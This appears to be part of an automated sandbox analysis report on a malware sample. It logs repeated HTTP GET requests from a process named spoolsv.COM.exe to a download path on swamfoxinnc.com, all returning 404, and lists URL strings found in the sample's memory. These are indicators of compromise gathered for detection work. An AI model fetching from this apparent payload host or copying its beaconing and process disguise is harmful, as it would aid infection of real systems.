          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: GET /233_Svcrhpjadgy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: swamfoxinnc.com
          Source: global trafficDNS traffic detected: DNS query: swamfoxinnc.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:41 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:44 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:48 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:51 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:55 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:37:58 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:02 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:05 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:09 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:12 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:15 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:19 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:22 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:26 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:29 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:33 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:36 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:40 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:43 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:47 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:50 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:54 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:38:57 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:00 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:04 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:07 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:11 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:14 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:18 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:21 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:25 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:28 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:32 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:35 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Dec 2024 06:39:39 GMTContent-Type: text/htmlContent-Length: 58296Connection: closeVary: Accept-EncodingETag: "674db0b4-e3b8"
          Source: spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/
          Source: spoolsv.COM.exe, 00000005.00000002.2530227433.00000000209C3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcr
          Source: spoolsv.COM.exe, 00000005.00000003.1875655364.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy
          Source: spoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy%
          Source: spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1875655364.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy.
          Source: spoolsv.COM.exe, 00000005.00000003.1391456768.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1499063783.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy/1fe
          Source: spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy6
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy8
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000586000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy8$Q8
          Source: spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyA
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyD
          Source: spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyH
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000566000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyIv
          Source: spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015505001.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyP
          Source: spoolsv.COM.exe, 00000005.00000003.1634798650.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyW
          Source: spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyZ
          Source: spoolsv.COM.exe, 00000005.00000003.1841751960.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1875655364.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2015505001.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1737114242.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgyi
          Source: spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1600782593.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgyj
          Source: spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2152748998.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1600782593.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgyl
          Source: spoolsv.COM.exe, 00000005.00000003.1356542930.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1632591145.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgyr
          Source: spoolsv.COM.exe, 00000005.00000003.1632591145.00000000005CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgyt
          Source: spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_SvcrhpjadgyuiQ
          Source: spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/233_Svcrhpjadgy~
          Source: spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/?
          Source: spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.000000000051E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2186886665.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1533358916.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1947111725.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/d
          Source: spoolsv.COM.exe, 00000005.00000003.1634798650.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/o
          Source: spoolsv.COM.exe, 00000005.00000003.2466011229.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2049371642.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1499063783.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2257555113.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1910755600.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1980977994.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1356542930.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2083372135.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2221831704.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1668484211.00000000005C9000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1772811035.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1464707281.00000000005C2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1702373874.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2118349105.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.1807574988.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2396794289.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2291813654.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com/rx
          Source: spoolsv.COM.exe, 00000005.00000003.2396794289.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2503409286.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000002.2512765082.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2326326708.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2430700731.0000000000593000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM.exe, 00000005.00000003.2362712355.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swamfoxinnc.com:443/233_Svcrhpjadgy
